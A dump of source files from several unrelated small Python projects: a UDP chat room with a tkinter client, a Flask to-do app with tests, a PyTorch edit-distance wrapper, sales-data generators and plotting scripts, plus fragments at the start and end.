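        return imgs.shape, lbls.shape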
``` |
{
"source": "1Ya1YaY0u/FininalProject",
"score": 3
} |
#### File: FininalProject/ChattingRoom/server.py
```python
import socket
import time
class Server(object):
def __init__(self):
self.hostIP = '127.0.0.1'
self.hostPort = 9999
def startServer(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # create socket object
s.bind((self.hostIP, self.hostPort))
chattingHistory = {} # key for clientAddr, value for chatting data
print("\033[0;32m Server on\033[0m\n")
clients = [] # records for all clients
while True:
            recvData, clientAddr = s.recvfrom(1024) # receive data
chattingRcd = time.ctime() + '\n' + recvData.decode('utf-8') + '\n'
if clients.count(clientAddr) == 0: # if this client is not recorded, then add it to list
clients.append(clientAddr)
chattingHistory[clientAddr] = chattingRcd # add data to history
else:
chattingHistory[clientAddr] += chattingRcd
            # if recvData == sys.stdin(exit): # stop receiving data
if recvData == b'cmd -h': # search chatting history(what this client said)
print("Client {} request to search chatting history\n".format(clientAddr))
# tips = "\033[0;33mChatting history of client {}\033[0m\n".format(clientAddr).encode('utf-8')
tips = "Chatting history of client {}\n".format(clientAddr).encode('utf-8')
s.sendto(tips + chattingHistory[clientAddr].encode('utf-8'), clientAddr)
continue
showName = "Message From Client \'{0[0]}, {0[1]}\': \n".format(clientAddr)
print(' ' + showName + recvData.decode('utf-8')) # server is listening
for addr in clients: # forward data to all other clients
if addr != clientAddr:
s.sendto(showName.encode('utf-8') + recvData + b'\n', addr)
# s.sendto(recvData, addr)
s.close() # close socket
if __name__ == "__main__":
server = Server()
server.startServer()
```
#### File: FininalProject/ChattingRoom_wzk/client.py
```python
import socket
import threading
import tkinter as tk
from my_aes import PrpCrypt
class Client_wzk(object):
def __init__(self, mytop):
self.top = mytop
self.ip_entry = tk.Entry(self.top, width=80)
self.port_entry = tk.Entry(self.top, width=80)
self.passwd_entry = tk.Entry(self.top, width=80)
self.send_entry = tk.Entry(self.top, width=80)
self.recv_entry = tk.Text(self.top, width=80)
self.hostIP = '127.0.0.1'
self.hostPort = 9999
self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.pc = PrpCrypt("keyskeyskeyskeys")
def startClient(self, ip, portNum):
# ip = self.ip_entry.get()
# portNum = int(self.port_entry.get())
# passwd = self.passwd_entry.get()
print("start client", ip, portNum)
# self.s.bind((ip, portNum))
# print(self.s)
print('\033[0;32m Client \'{}, {}\' on\nYou can now start chatting...\033[0m\n'.format(ip, portNum))
send_t = threading.Thread(target=self.send_thread, args=(self.s,)) # send thread
send_t.setDaemon(True)
send_t.start()
recv_t = threading.Thread(target=self.recv_thread, args=(self.s,)) # recv thread
recv_t.setDaemon(True)
recv_t.start()
def login(self):
ip = self.ip_entry.get()
portNum = self.port_entry.get()
self.s.bind((ip, int(portNum)))
# for i in range(5): # 5 times to input correct passwd
# portNum = int(self.port_entry.get())
passwd = self.passwd_entry.get()
loginInfo = '$login' + ip + "," + portNum + ":" + passwd
encrypt_data = self.pc.encrypt(loginInfo.encode('utf-8'))
self.s.sendto(encrypt_data, (self.hostIP, self.hostPort))
print(loginInfo)
resp, addr = self.s.recvfrom(1024) # response from server
if self.pc.decrypt(resp) == b"pass": # account and passwd ok, then start client
self.recv_entry.insert(0.0, "Login\n")
print("params", ip, portNum)
self.startClient(ip, int(portNum))
        elif self.pc.decrypt(resp) == b"failed": # verification failed, can try again, but not more than 5 times
# self.ip_entry.delete(0,20)
# self.port_entry.delete(0,20)
self.passwd_entry.delete(0, 20)
self.s.close() # need to improve
self.recv_entry.insert(0.0, "Wrong passwd for this account")
print("try again")
else: # unexpected resp
self.passwd_entry.delete(0, 20)
self.s.close()
self.recv_entry.insert(0.0, "Wrong passwd for this account")
print("error")
# break
def send_thread(self, socket):
print("send thread")
inputData = self.send_entry.get().encode('utf-8')
self.send_entry.delete(0, 100)
if inputData == b"exit": # exit client
# break
return
encrypt_data = self.pc.encrypt(inputData)
socket.sendto(encrypt_data, (self.hostIP, self.hostPort))
def recv_thread(self, socket):
while True:
recvData, recvAddr = socket.recvfrom(1024)
print("***recvdata", recvData)
decrypted_data = self.pc.decrypt(recvData)
print("***decdata", decrypted_data)
if recvAddr != (self.hostIP, self.hostPort): # discard data not from host
continue
self.recv_entry.insert(100.100, decrypted_data.decode('utf-8')) # blocked
def window(self):
self.top.title('Chatting Room by <NAME>')
tk.Label(self.top, text='Chatting Room by <NAME>')
tk.Label(self.top, text='IP').grid(row=1)
tk.Label(self.top, text='Port').grid(row=3)
tk.Label(self.top, text='Passwd').grid(row=5)
tk.Label(self.top, text='Send').grid(row=7)
tk.Label(self.top, text='Recv').grid(row=9)
self.ip_entry.grid(row=1, column=1)
self.port_entry.grid(row=3, column=1)
self.passwd_entry.grid(row=5, column=1)
self.send_entry.grid(row=7, column=1)
self.recv_entry.grid(row=9, column=1)
login = tk.Button(self.top, text='Login', bg='green',
command=self.login)
print("login btn")
sendData = tk.Button(self.top, text='Send', bg='green',
command=lambda: self.send_thread(self.s))
login.grid(row=5, column=2)
sendData.grid(row=7, column=2)
return 0
if __name__ == "__main__":
top = tk.Tk()
# top.geometry('800x500')
client = Client_wzk(top)
client.window()
top.mainloop()
# login btn not ended, maybe thread things
```
#### File: FininalProject/Spider/test.py
```python
from flask import Flask, request
import requests
from bs4 import BeautifulSoup
app = Flask(__name__)
@app.route('/')
def index():
# html = """
# <form>
# 姓名:
# <input type="text" name="myName">
# <br/>
# 密码:
# <input type="password" name="<PASSWORD>">
# </form>"""
html = """
<!DOCTYPE html>
<html>
<body>
<form action="/url" method="post">
URL:<br>
<input type="text" name="url" value="input url">
<br>
<input type="submit" value="Submit">
</form>
</body>
</html>
"""
return html
@app.route('/url', methods=["POST", "GET"])
def get_url():
url = request.form.get('url')
# print(url)
return url
def get_html(url):
"""get the content of the url"""
response = requests.get(url)
response.encoding = 'utf-8'
return response.text
# get content
def get_chapter_list(html):
"""get the joke of the html"""
print(html)
soup = BeautifulSoup(html, 'lxml')
# joke_content = soup.select('#contents')[0].get_text()
# head = soup.select('head')[0]
# print("head: \n", head)
# chapter_list = soup.find(class_='listmain')
# chapter_list = soup.find_all('a').get_text()
# href = [i.get('href') for i in chapter_list.find_all('a')]
# print(str(chapter_list))
# print(chapter_list)
# print("href", href)
# chapter_list = soup.select('.wrap')[0]
# print("chapter_list.name:", chapter_list.name)
content = soup.select('.showtxt')
print(content)
# return chapter_list
return content
if __name__ == '__main__':
# app.run(debug=True)
# url = "http://www.shuquge.com/txt/63542/index.html"
url = "http://www.shuquge.com/txt/8400/28344165.html"
html = get_html(url)
content = get_chapter_list(html)
``` |
{
"source": "1ytic/open_stt_e2e",
"score": 3
} |
#### File: 1ytic/open_stt_e2e/utterances.py
```python
import argparse
import numpy as np
from tqdm import tqdm
from os.path import join, isfile
from data import Labels
from joblib import Parallel, delayed
labels = Labels()
def job(text_path, numpy_path):
with open(text_path, 'r', encoding='utf8') as file:
text = file.read()
if not labels.is_accepted(text):
return None
required_frames = labels.required_frames(text)
actual_frames = len(np.load(numpy_path))
if required_frames > actual_frames:
return None
return '%s,%d,%s' % (numpy_path, actual_frames, text)
parser = argparse.ArgumentParser(description='Collect utterances')
parser.add_argument('--manifest', type=str)
parser.add_argument('--jobs', type=int, default=8)
args = parser.parse_args()
prefix = args.manifest.replace('.csv', '')
print(prefix)
files = dict()
with open(args.manifest) as f:
progress = tqdm(f.readlines())
for line in progress:
path = line.split(',')[0]
text_path = join(prefix, path.replace('.wav', '.txt'))
if not isfile(text_path):
continue
numpy_path = join(prefix, path.replace('.wav', '.npy'))
if not isfile(numpy_path):
continue
files[text_path] = numpy_path
tasks = []
for text_path, numpy_path in files.items():
tasks.append(delayed(job)(text_path, numpy_path))
print('Tasks:', len(tasks))
results = Parallel(n_jobs=args.jobs, backend='multiprocessing', verbose=1)(tasks)
utterances = sorted([r for r in results if r is not None])
print('Success:', len(utterances))
with open(prefix + '.txt', 'w', encoding='utf8') as file:
file.write('path,frames,text\n')
file.writelines(utterances)
``` |
{
"source": "1ytic/pytorch-edit-distance",
"score": 2
} |
#### File: pytorch-edit-distance/torch_edit_distance/__init__.py
```python
import torch
import torch_edit_distance_cuda as core
from pkg_resources import get_distribution
__version__ = get_distribution('torch_edit_distance').version
def collapse_repeated(
sequences, # type: torch.Tensor
lengths # type: torch.IntTensor
):
"""Merge repeated tokens.
Sequences and lengths tensors will be modified inplace.
Args:
sequences (torch.Tensor): Tensor (N, T) where T is the maximum
length of tokens from N sequences.
lengths (torch.IntTensor): Tensor (N,) representing the
number of tokens for each sequence.
"""
core.collapse_repeated(sequences, lengths)
def remove_blank(
sequences, # type: torch.Tensor
lengths, # type: torch.IntTensor
blank # type: torch.Tensor
):
"""Remove tokens.
Sequences and lengths tensors will be modified inplace.
Args:
sequences (torch.Tensor): Tensor (N, T) where T is the maximum
length of tokens from N sequences.
lengths (torch.IntTensor): Tensor (N,) representing the
number of tokens for each sequence.
blank (torch.Tensor): A set of tokens to remove.
"""
core.remove_blank(sequences, lengths, blank)
def strip_separator(
sequences, # type: torch.Tensor
lengths, # type: torch.IntTensor
separator # type: torch.Tensor
):
"""Remove tokens.
Sequences and lengths tensors will be modified inplace.
Args:
sequences (torch.Tensor): Tensor (N, T) where T is the maximum
length of tokens from N sequences.
lengths (torch.IntTensor): Tensor (N,) representing the
number of tokens for each sequence.
separator (torch.Tensor): A set of tokens to remove as
leading/trailing tokens as well as repeated middle tokens.
"""
core.strip_separator(sequences, lengths, separator)
def levenshtein_distance(
hypotheses, # type: torch.Tensor
references, # type: torch.Tensor
hypothesis_lengths, # type: torch.IntTensor
references_lengths, # type: torch.IntTensor
blank, # type: torch.Tensor
separator # type: torch.Tensor
):
"""Levenshtein edit-distance for separated words or independent tokens.
Return torch.ShortTensor (N, 4) with detail ins/del/sub/len statistics.
Args:
hypotheses (torch.Tensor): Tensor (N, H) where H is the maximum
length of tokens from N hypotheses.
references (torch.Tensor): Tensor (N, R) where R is the maximum
length of tokens from N references.
hypothesis_lengths (torch.IntTensor): Tensor (N,) representing the
number of tokens for each hypothesis.
references_lengths (torch.IntTensor): Tensor (N,) representing the
number of tokens for each reference.
blank (torch.Tensor): tokens used to represent the blank symbol.
separator (torch.Tensor): tokens used to represent the separator symbol.
"""
assert hypotheses.dim() == 2
assert references.dim() == 2
assert hypothesis_lengths.dim() == 1
assert references_lengths.dim() == 1
assert hypotheses.size(0) == hypothesis_lengths.numel()
assert references.size(0) == references_lengths.numel()
assert hypothesis_lengths.numel() == references_lengths.numel()
return core.levenshtein_distance(hypotheses, references,
hypothesis_lengths, references_lengths,
blank, separator)
def compute_wer(hs, rs, hn, rn, blank, space):
data = levenshtein_distance(hs, rs, hn, rn, blank, space).float()
wer = data[:, :3].sum(dim=1) / data[:, 3]
return wer
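# Editorial usage sketch (assumes the torch_edit_distance_cuda extension is built
# and a GPU is available); all tensor values below are illustrative:
#
#   blank = torch.tensor([0], dtype=torch.int).cuda()
#   space = torch.tensor([1], dtype=torch.int).cuda()
#   hs = torch.tensor([[2, 3, 4]], dtype=torch.int).cuda()   # hypothesis tokens
#   rs = torch.tensor([[2, 4, 4]], dtype=torch.int).cuda()   # reference tokens
#   hn = torch.tensor([3], dtype=torch.int).cuda()           # hypothesis lengths
#   rn = torch.tensor([3], dtype=torch.int).cuda()           # reference lengths
#   wer = compute_wer(hs, rs, hn, rn, blank, space)          # per-utterance error rate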
class AverageWER(object):
def __init__(self, blank, space, title='WER', detail=2):
self.blank = blank
self.space = space
self.title = title
self.detail = detail
self.data = 0
def update(self, hs, rs, hn, rn):
data = levenshtein_distance(hs, rs, hn, rn, self.blank, self.space)
self.data += data.sum(dim=0).float()
def values(self):
_ins = self.data[0]
_del = self.data[1]
_sub = self.data[2]
_len = self.data[3]
_err = (_ins + _del + _sub) / _len * 100
if self.detail == 2:
_ins = _ins / _len * 100
_del = _del / _len * 100
_sub = _sub / _len * 100
return _err, _ins, _del, _sub
def summary(self, writer, epoch):
_err, _ins, _del, _sub = self.values()
if self.detail > 0:
writer.add_scalar(self.title + '/insertions', _ins, epoch)
writer.add_scalar(self.title + '/deletions', _del, epoch)
writer.add_scalar(self.title + '/substitutions', _sub, epoch)
writer.add_scalar(self.title, _err, epoch)
def __str__(self):
_err, _ins, _del, _sub = self.values()
info = '%s %.1f' % (self.title, _err)
if self.detail == 1:
info += ' [ %d ins, %d del, %d sub ]' % (_ins, _del, _sub)
elif self.detail == 2:
info += ' [ %.1f ins, %.1f del, %.1f sub ]' % (_ins, _del, _sub)
return info
class AverageCER(AverageWER):
def __init__(self, blank, space, title='CER', detail=2):
blank = torch.cat([blank, space])
space = torch.empty([], dtype=space.dtype, device=space.device)
super(AverageCER, self).__init__(blank, space, title, detail)
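# Editorial usage sketch (illustrative): accumulate statistics over an evaluation
# loop and print the aggregated error rates.
#
#   wer = AverageWER(blank, space)
#   for hs, rs, hn, rn in batches:
#       wer.update(hs, rs, hn, rn)
#   print(wer)   # e.g. "WER 12.3 [ 2.1 ins, 3.4 del, 6.8 sub ]" (numbers are made up)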
``` |
{
"source": "1Zarkos1/flask_todo_list",
"score": 2
} |
#### File: flask_todo_list/tests/test_main.py
```python
from datetime import timedelta, datetime
import pytest
from wtforms.validators import ValidationError
from flask_wtf.csrf import generate_csrf
from flask_login import current_user
from todo import TaskForm, RegistrationForm, LoginForm, User, db, Task
VALID_DUE_DATE = datetime.now() + timedelta(days=1)
def test_index_page(client):
resp = client.get("/")
assert resp.status_code == 200
assert "Create new task" in resp.data.decode("utf-8")
def test_task_addition(client):
resp = client.post(
"/",
data={
"title": "Test title",
"description": "Test description",
"date_due": VALID_DUE_DATE.strftime("%Y-%m-%dT%H:%M"),
},
follow_redirects=True,
)
assert len(Task.query.all()) == 1
assert b"Test title" in resp.data
assert b"Test description" in resp.data
@pytest.mark.parametrize(
"title,date_due,description",
[
("", VALID_DUE_DATE, "test descrition"),
("test title", "", "test description"),
("test title", VALID_DUE_DATE, ""),
("test title", "random", "test"),
],
)
def test_task_form_validation_on_missing_value(app_inst, title, date_due, description):
with app_inst.test_request_context(
method="POST",
data={"title": title, "date_due": date_due, "description": description},
):
form = TaskForm()
assert form.validate_on_submit() == False
@pytest.mark.parametrize(
"date_due",
[VALID_DUE_DATE, 2222, VALID_DUE_DATE.strftime("%Y-%m-%d"), "random string"],
)
def test_incorrect_date_due_format(client, date_due):
resp = client.post(
"/",
data={
"title": "Test title",
"description": "Test description",
"date_due": date_due,
},
follow_redirects=True,
)
assert resp.status_code == 200
assert b"Not a valid datetime value" in resp.data
def test_correct_registration_form(app_inst):
with app_inst.test_request_context():
form = RegistrationForm(
email="<EMAIL>", password="<PASSWORD>", pass_repeat="<PASSWORD>"
)
assert form.validate() == True
@pytest.mark.parametrize(
"email,password,error",
[
("<EMAIL>", "fizz", "pass_repeat"),
("something_mail.com", "test", "email"),
],
)
def test_incorrect_data_in_registration_form(app_inst, email, password, error):
with app_inst.test_request_context():
form = RegistrationForm(email=email, password="<PASSWORD>", pass_repeat=password)
assert form.validate() == False
assert len(form.errors) == 1
assert error in form.errors
def test_user_already_exists_in_registration_form(app_inst):
db.session.add(User(email="<EMAIL>", password="<PASSWORD>"))
db.session.commit()
with app_inst.test_request_context():
form = RegistrationForm(
email="<EMAIL>", password="<PASSWORD>", pass_repeat="<PASSWORD>"
)
assert form.validate() == False
assert len(form.errors) == 1
assert "User with this email already exist" in form.errors["email"]
def test_user_registration(app_inst, client):
resp = client.post(
"/register/",
data={
"email": "<EMAIL>",
"password": "<PASSWORD>",
"pass_repeat": "test",
},
follow_redirects=True,
)
users = User.query.all()
user = users[0]
assert len(users) == 1
assert user.email == "<EMAIL>"
def test_user_login(app_inst, client):
with app_inst.test_request_context():
user = User(email="<EMAIL>", password="<PASSWORD>")
db.session.add(user)
db.session.commit()
resp = client.post(
"/",
data={
"email": "<EMAIL>",
"password": "<PASSWORD>",
},
follow_redirects=True,
)
assert b"<EMAIL>" in resp.data
assert b"Log Out" in resp.data
```
#### File: 1Zarkos1/flask_todo_list/todo.py
```python
from datetime import datetime
import bcrypt
from flask import Flask, redirect, render_template, request, url_for, jsonify, flash
from flask_sqlalchemy import SQLAlchemy
from flask_login import UserMixin, LoginManager, login_user, current_user, logout_user
from flask_wtf import FlaskForm
from flask_wtf.csrf import CSRFProtect
from wtforms import (
StringField,
TextAreaField,
HiddenField,
IntegerField,
PasswordField,
SubmitField,
)
from wtforms.fields.html5 import DateTimeLocalField, EmailField
from wtforms.validators import DataRequired, ValidationError, Email, EqualTo
app = Flask(__name__, static_folder="./assets")
app.config.from_object("config.DevConfig")
app.jinja_options["trim_blocks"] = True
app.jinja_options["lstrip_blocks"] = True
db = SQLAlchemy(app)
login = LoginManager(app)
# csrf = CSRFProtect(app)
class User(UserMixin, db.Model):
__tablename__ = "user"
email = db.Column(db.String, primary_key=True)
_password = db.Column(db.String)
tasks = db.relationship("Task", backref="author", cascade="delete, delete-orphan")
def get_id(self):
return self.email
@property
def password(self):
return self._password
@password.setter
def password(self, plain_pass):
self._password = bcrypt.hashpw(plain_pass.encode("utf-8"), bcrypt.gensalt())
def check_password(self, password):
return bcrypt.checkpw(password.encode("utf-8"), self._password)
@login.user_loader
def loader(email):
return User.query.get(email)
class Task(db.Model):
__tablename__ = "task"
id = db.Column(db.Integer, primary_key=True)
author_email = db.Column(db.String, db.ForeignKey("user.email"), index=True)
title = db.Column(db.String)
    date_created = db.Column(db.DateTime, default=datetime.now)  # pass the callable so the timestamp is evaluated per insert, not once at import time
date_due = db.Column(db.DateTime)
date_completed = db.Column(db.DateTime)
description = db.Column(db.String)
def __repr__(self):
return f"<Task - №{self.id}>"
class RegistrationForm(FlaskForm):
email = EmailField("Email", validators=[Email()])
password = PasswordField("Password")
pass_repeat = PasswordField("Repeat password", validators=[EqualTo("password")])
submit = SubmitField("Register")
def validate_email(self, email):
if User.query.filter_by(email=email.data).first():
raise ValidationError("User with this email already exist")
class LoginForm(FlaskForm):
email = EmailField("Email", validators=[Email()])
password = PasswordField("Password")
submit = SubmitField("Login")
class TaskForm(FlaskForm):
title = StringField("Title", validators=[DataRequired()])
date_due = DateTimeLocalField("Date due", format="%Y-%m-%dT%H:%M")
description = TextAreaField("Description", validators=[DataRequired()])
hidden_id = HiddenField()
submit = SubmitField("Add task")
def validate_date_due(self, date_due):
if date_due.data is None:
raise ValidationError(
'This field is required with the following \
format "year-month-dayThour:minute"'
)
if date_due.data < datetime.now():
raise ValidationError("Due time must be in the future.")
@app.route("/", methods=["GET", "POST"])
def show_tasks():
form = TaskForm()
log_form = LoginForm()
if "password" in request.form:
if log_form.validate_on_submit():
user = User.query.get(log_form.email.data)
            if user is not None and user.check_password(log_form.password.data):
login_user(user)
return redirect("/")
else:
if form.validate_on_submit():
if _id := form.hidden_id.data:
t = Task.query.get(int(_id))
else:
t = Task()
t.author = current_user if current_user.is_authenticated else None
db.session.add(t)
form.populate_obj(t)
db.session.commit()
return redirect("/")
filt = current_user.email if current_user.is_authenticated else None
result = (
Task.query.filter_by(author_email=filt)
.order_by(Task.date_completed.asc(), Task.date_due.desc())
.all()
)
return render_template("index.html", result=result, form=form, log_form=log_form)
@app.route("/get_tasks/", methods=["POST"])
def get_tasks():
email_filter = current_user.email if current_user.is_authenticated else None
if request.get_json():
tasks = Task.query.filter(Task.date_completed == None).filter(
Task.date_due > datetime.now()
)
else:
tasks = Task.query
tasks = (
tasks.filter_by(author_email=email_filter)
.order_by(Task.date_completed.asc(), Task.date_due.desc())
.all()
)
return render_template("_todos.html", result=tasks)
@app.route("/register/", methods=["POST", "GET"])
def register():
form = RegistrationForm()
if form.validate_on_submit():
user = User()
form.populate_obj(user)
db.session.add(user)
db.session.commit()
return redirect(url_for("show_tasks"))
return render_template("register.html", form=form)
@app.route("/profile/<user>")
def profile(user):
pass
@app.route("/logout/")
def logout():
logout_user()
return redirect("/")
@app.route("/complete-task/<int:id>")
def complete_task(id):
Task.query.get(id).date_completed = datetime.now()
db.session.commit()
return jsonify(True)
@app.route("/delete-task/<int:id>")
def delete_task(id):
db.session.delete(Task.query.get(id))
db.session.commit()
return jsonify(True)
@app.template_filter()
def time(date_obj):
return date_obj.strftime("%Y-%m-%d %H:%M:%S")
@app.template_filter()
def interval(interval_obj):
return str(interval_obj).split(".")[0]
@app.context_processor
def set_required_variables():
return dict(now=datetime.now())
``` |
{
"source": "1Zero64/IndAna",
"score": 3
} |
#### File: DataGenerators/Configuration/Season.py
```python
def getSeason(date, articleId):
'''
    calculates and returns the season weight for an article
:param date: (date)
date to get the article seasonality
articleId: (int)
identifier of the article to get the article seasonality and article weight
:return:
articleSeasonWeight: (float)
            season weight for an article
'''
articleSeasonWeight = ((articleSeasonality[articleId][date.month-1]-1) * articleWeight[articleId])
return articleSeasonWeight
# Seasonality weight for a product for each month
articleSeasonality = {
1: [1.5, 1.2, 1.0, 1.0, 1.0, 1.0, 1.0, 1.4, 1.7, 2.0, 1.6, 1.9], # Apfel
2: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0], # Milch
3: [1.0, 1.0, 1.0, 1.4, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.4], # Klopapier
4: [1.0, 1.0, 1.0, 1.5, 1.2, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.4], # Salmon
5: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.6], # T-Bone steak
6: [1.7, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.8, 3.0], # Ginger Bread
7: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.1, 1.2, 1.4], # Berliner (Doughnut)
8: [1.0, 1.0, 1.0, 1.4, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.4], # Egg
9: [1.0, 1.0, 1.0, 1.1, 1.3, 1.5, 1.7, 1.9, 1.7, 1.3, 1.0, 1.0], # Watermelon
10: [1.2, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.1, 1.2, 1.3, 1.4], # Soup vegetables
}
# impact of seasonality on outcome article volume (value between 0.0 and 2.0)
articleWeight = {
1: 1.0,
2: 0.0,
3: 0.6,
4: 0.4,
5: 0.5,
6: 1.5,
7: 0.5,
8: 0.7,
9: 0.7,
10: 0.8,
}
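# Editorial worked example: for articleId=1 (Apfel) in October (month 10),
# articleSeasonality[1][9] is 2.0 and articleWeight[1] is 1.0, so
# getSeason(date(2021, 10, 15), 1) returns (2.0 - 1) * 1.0 = 1.0.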
```
#### File: DataProcessing/DataGenerators/GeneratorStockarticles.py
```python
import pandas as pd
import random
from matplotlib import pyplot as plt
import DataProcessing.DataGenerators.Configuration.Season as seas
def generateStockArticles(hasToBeGenerated=False):
'''
:param hasToBeGenerated: (bool)
        true: stockarticles data gets freshly generated; default false: reuse the previously generated .csv file
:return: stock: (pandas.dataframe)
dataframe with generated stockarticles
'''
random.seed(42)
if hasToBeGenerated:
# get article list
path = '../Datasets/Articles/articles.csv'
articles = pd.read_csv(path, header=[0])
# obtain total number of articles
# articleCount = sum(1 for row in articles)
print("fetching date information and creating possible production dates")
# get current date
# todayInit = date.today()
# today = todayInit.strftime("%y-%m-%d")
# possible production date options
# dates = pd.date_range(start=sept 2020, end=okt 2021)
dates = pd.date_range(start="2016-01-01", end="2021-09-30").date
print()
print("creating new dataframe")
# set dataframe columns
columns = ['articleID', 'productionDate', 'Quantity']
stock = pd.DataFrame(columns=columns)
print("creating data")
# writing data frame
for i in range(1000):
#generating attributes
articleId = int(articles.iloc[random.randint(0, articles.shape[0]-1)]["ID"])
productionDate = dates[random.randint(0, len(dates) - 1)]
# execute seasonality determination
randomQuantity = random.randint(5, 20)
seasonweight = seas.getSeason(productionDate, articleId)
quantity = int(randomQuantity + randomQuantity * seasonweight)
#creating rows
stock.loc[i] = [articleId,productionDate, quantity]
print("Sorting entries")
# sort values by articleId -> Date
stock = stock.sort_values(["productionDate", "articleID"]).reset_index(drop=True)
stock.plot('productionDate', y='Quantity')
plt.show()
stock.to_csv('../Datasets/Stockarticles/stockarticles.csv', index_label='ID')
else:
stock = pd.read_csv('../Datasets/Stockarticles/stockarticles.csv', index_col=False)
return stock
if __name__ == '__main__':
generateStockArticles(False)
```
#### File: IndAna/ResultsVisualisation/ResultsVisualisation.py
```python
from matplotlib import pyplot as plt
import matplotlib.dates as mdates
import datetime as dt
# from setuptools.msvc import winreg  # spurious auto-added import (unused and Windows-only); removed
import MachineLearning.LinearRegression.LinearRegression as lr
import MachineLearning.LinearRegression.PolynomialRegression as plr
def linearRegressionVisualisation(articleId):
'''
    Plots the sales data and predictions of the linear regression machine learning model for an article in a 2d plot
    :param articleId: (int)
        identifier for an article
'''
sales, realSales, predictions, articleName = lr.linearRegression(articleId)
dates = [dt.datetime.strptime(d, '%Y-%m-%d').date() for d in sales['date']]
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=int(len(dates) / 10)))
plt.scatter(dates, realSales, s=10, label="Verkaufsmenge am Tag")
plt.plot(dates, predictions, color='red', label='Vorhersage')
plt.gcf().autofmt_xdate()
plt.title("Verkaufsverlauf für das Produkt {}".format(articleName))
plt.xlabel("Datum")
plt.ylabel("Verkaufsmenge")
plt.legend(loc="best")
plt.show()
def linearRegression3dVisualisation(articleId):
'''
    Plots the sales data and predictions of the linear regression machine learning model for an article in a 3d plot
    :param articleId: (int)
        identifier for an article
'''
sales, realSales, predictions, articleName = lr.linearRegression(articleId)
dates = [dt.datetime.strptime(d, '%Y-%m-%d').date() for d in sales['date']]
ax = plt.axes(projection='3d')
ax.set_xlabel('Date')
ax.set_ylabel('Average Temperature')
ax.set_zlabel('Sales')
xAxis = range(len(sales['date']))
# Data for a three-dimensional line
ax.plot3D(xAxis, sales['tavg'], predictions, 'red')
# Data for three-dimensional scattered points
ax.scatter3D(xAxis, sales['tavg'], realSales, alpha=0.3, facecolors='none', edgecolors='blue')
ax.xaxis.set_ticks(xAxis)
ax.xaxis.set_ticklabels(dates)
plt.title("Sales history for the article {}".format(articleName))
plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=int(len(dates) / 5)))
plt.show()
def polynomialRegressionVisualisation(articleId):
'''
    Plots the sales data and predictions of the polynomial regression machine learning model for an article in a 2d plot
    :param articleId: (int)
        identifier for an article
'''
sales, realSales, predictions, articleName = plr.polynomialRegression(articleId)
dates = [dt.datetime.strptime(d, '%Y-%m-%d').date() for d in sales['date']]
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=int(len(dates)/10)))
plt.scatter(dates, realSales, s=10, label="Verkaufsmenge am Tag")
plt.plot(dates, predictions, color='red', label='Vorhersage')
plt.gcf().autofmt_xdate()
plt.title("Verkaufsverlauf für das Produkt {}".format(articleName))
plt.xlabel("Datum")
plt.ylabel("Verkaufsmenge")
plt.legend(loc="best")
plt.show()
def polynomialRegression3dVisualisation(articleId):
'''
    Plots the sales data and predictions of the polynomial regression machine learning model for an article in a 3d plot
    :param articleId: (int)
        identifier for an article
'''
sales, realSales, predictions, articleName = plr.polynomialRegression(articleId)
dates = [dt.datetime.strptime(d, '%Y-%m-%d').date() for d in sales['date']]
ax = plt.axes(projection='3d')
ax.set_xlabel('Date')
ax.set_ylabel('Average Temperature')
ax.set_zlabel('Sales')
xAxis = range(len(sales['date']))
# Data for a three-dimensional line
ax.plot3D(xAxis, sales['tavg'], predictions, 'red')
# Data for three-dimensional scattered points
ax.scatter3D(xAxis, sales['tavg'], realSales, alpha=0.3, facecolors='none', edgecolors='blue')
ax.xaxis.set_ticks(xAxis)
ax.xaxis.set_ticklabels(dates)
plt.title("Sales history for the article {}".format(articleName))
plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=int(len(dates) / 5)))
plt.show()
def SARIMAXVisualisation(articleId):
'''
    Plots the sales data and predictions of the SARIMAX machine learning model for an article in a 2d plot
    :param articleId: (int)
        identifier for an article
'''
pass
def RNNVisualisation(articleId):
'''
    Plots the sales data and predictions of the RNN machine learning model for an article in a 2d plot
    :param articleId: (int)
        identifier for an article
'''
pass
if __name__ == '__main__':
# Change for different articles
wishedArticleId = 1
linearRegression3dVisualisation(wishedArticleId)
polynomialRegression3dVisualisation(wishedArticleId)
``` |
{
"source": "1ZimingYuan/ConAM",
"score": 2
} |
#### File: ConAM/models/ConAM.py
```python
from torch import Tensor
import torch
from torch import nn
from einops import rearrange, reduce


class conam(nn.Module):
    """Context-aware attention module (ConAM).

    NOTE (editorial): the original file only contained the two method bodies below
    at module level (with a dangling ``self``); this nn.Module wrapper, the
    linear1/linear2 sizes (inchannel -> inchannel) and the softmax over the patch
    dimension are assumptions added so the module matches how resnet50.py
    instantiates it: conam(patch_size=..., inchannel=...).
    """

    def __init__(self, patch_size: int, inchannel: int) -> None:
        super().__init__()
        self.patch_size = patch_size
        self.linear1 = nn.Linear(inchannel, inchannel)
        self.linear2 = nn.Linear(inchannel, inchannel)
        self.relu = nn.ReLU(inplace=True)
        self.softmax = nn.Softmax(dim=1)

    def Attention(self, input: Tensor) -> Tensor:
        # global descriptor: average over the spatial dimensions
        global_feature = reduce(input, 'b c h w -> b c', reduction='mean')
        global_feature = rearrange(global_feature, 'b c -> b 1 c ')
        # local descriptors: average inside each (patch_size x patch_size) patch
        local_feature = rearrange(input, 'b c (h h1) (w w1) -> b c h w h1 w1', h1=self.patch_size, w1=self.patch_size)
        input_ = local_feature
